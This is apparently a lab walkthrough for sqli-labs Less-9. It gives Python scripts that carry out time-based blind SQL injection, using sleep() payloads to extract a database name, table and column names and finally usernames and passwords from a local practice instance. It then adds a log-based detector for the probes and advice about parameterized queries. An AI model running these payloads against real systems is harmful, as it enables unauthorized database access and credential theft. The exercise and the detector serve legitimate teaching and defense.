
SQL Injection Example (sqli-labs/less-9)

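0. Initial page

1. Extract the database name

Using a Python script:

```python
import time

import requests

# Placeholder: address of Less-9 on your own local sqli-labs lab instance
url = "http://localhost/Less-9/"


def inject_database1(url):
    name = ''
    for i in range(1, 20):  # character positions 1..19
        # Binary search over the ASCII range for the character at position i
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # If the condition is true, the response is delayed by sleep(2)
            payload = "1' and if(ascii(substr(database(),%d,1)) > %d ,sleep(2),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 2:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # The search ends at 32 when there is no character at this position
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)
```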

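2. Extract the table names

Using a Python script:

```python
import time

import requests

# Placeholder: address of Less-9 on your own local sqli-labs lab instance
url = "http://localhost/Less-9/"


def inject_database1(url):
    name = ''
    for i in range(1, 20):  # character positions 1..19
        # Binary search over the ASCII range for the character at position i
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Table names of the 'security' schema; a true condition delays the response by sleep(1)
            payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # The search ends at 32 when there is no character at this position
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)
```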

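3. Extract the column names

Using a Python script:

```python
import time

import requests

# Placeholder: address of Less-9 on your own local sqli-labs lab instance
url = "http://localhost/Less-9/"


def inject_database1(url):
    name = ''
    for i in range(1, 20):  # character positions 1..19
        # Binary search over the ASCII range for the character at position i
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Column names of security.users; a true condition delays the response by sleep(1)
            payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # The search ends at 32 when there is no character at this position
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)
```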

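4. Display the final target

Using a Python script:

```python
import time

import requests

# Placeholder: address of Less-9 on your own local sqli-labs lab instance
url = "http://localhost/Less-9/"


def inject_database1(url):
    name = ''
    for i in range(1, 20):  # character positions 1..19
        # Binary search over the ASCII range for the character at position i
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # username:password pairs from users (0x3a is ':'); a true condition delays the response by sleep(1)
            payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # The search ends at 32 when there is no character at this position
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)
```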
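Added example (not part of the original post): every request sent by the scripts above carries the same `if(ascii(substr(...,pos,1)) > N ,sleep(T),0)` condition, so the extraction is visible in web server logs. The Python code below finds those probes in access-log lines and reports whether the delay actually occurred; the log format, the sample lines, and the function names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines: client, request, status, seconds taken (assumed log format).
SAMPLE_LOG = """\
203.0.113.7 "GET /Less-9/?id=1%27+and+if%28ascii%28substr%28database%28%29%2C1%2C1%29%29+%3E+80+%2Csleep%282%29%2C0%29--+ HTTP/1.1" 200 2.004
203.0.113.7 "GET /Less-9/?id=1%27+and+if%28ascii%28substr%28database%28%29%2C1%2C1%29%29+%3E+104+%2Csleep%282%29%2C0%29--+ HTTP/1.1" 200 2.006
203.0.113.7 "GET /Less-9/?id=1%27+and+if%28ascii%28substr%28database%28%29%2C1%2C1%29%29+%3E+116+%2Csleep%282%29%2C0%29--+ HTTP/1.1" 200 0.003
198.51.100.4 "GET /Less-9/?id=2 HTTP/1.1" 200 0.002
198.51.100.4 "GET /search?q=how+to+sleep%282%29+in+mysql HTTP/1.1" 200 0.004
"""

LINE = re.compile(r'(?P<ip>\S+) "GET (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<secs>[\d.]+)')
# Shape of the condition used by the scripts on this page (matched after URL decoding).
PROBE = re.compile(
    r"if\s*\(\s*ascii\s*\(\s*substr\s*\((?P<expr>.+),\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*>\s*(?P<mid>\d+)\s*,\s*sleep\s*\(\s*(?P<delay>\d+(?:\.\d+)?)\s*\)",
    re.IGNORECASE | re.DOTALL)


def find_timing_probes(log_text):
    """Return {client_ip: [(position, threshold, delayed), ...]} for probe requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)  # decodes %xx and '+'
        for values in query.values():
            for value in values:
                p = PROBE.search(value)
                if p:
                    # delayed=True: the response took at least the requested sleep time
                    delayed = float(m["secs"]) >= float(p["delay"])
                    hits[m["ip"]].append((int(p["pos"]), int(p["mid"]), delayed))
    return dict(hits)


def summarize(hits, min_probes=3):
    """Clients with at least min_probes probes, and whether any sleep() took effect."""
    return {ip: {"probes": len(rows),
                 "positions": sorted({pos for pos, _, _ in rows}),
                 "executed": any(d for _, _, d in rows)}
            for ip, rows in hits.items() if len(rows) >= min_probes}


if __name__ == "__main__":
    print(summarize(find_timing_probes(SAMPLE_LOG)))
```

An `executed` value of `True` means the database ran the injected `sleep()`, so the parameter is injectable and should be moved to a parameterized query, not just filtered.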
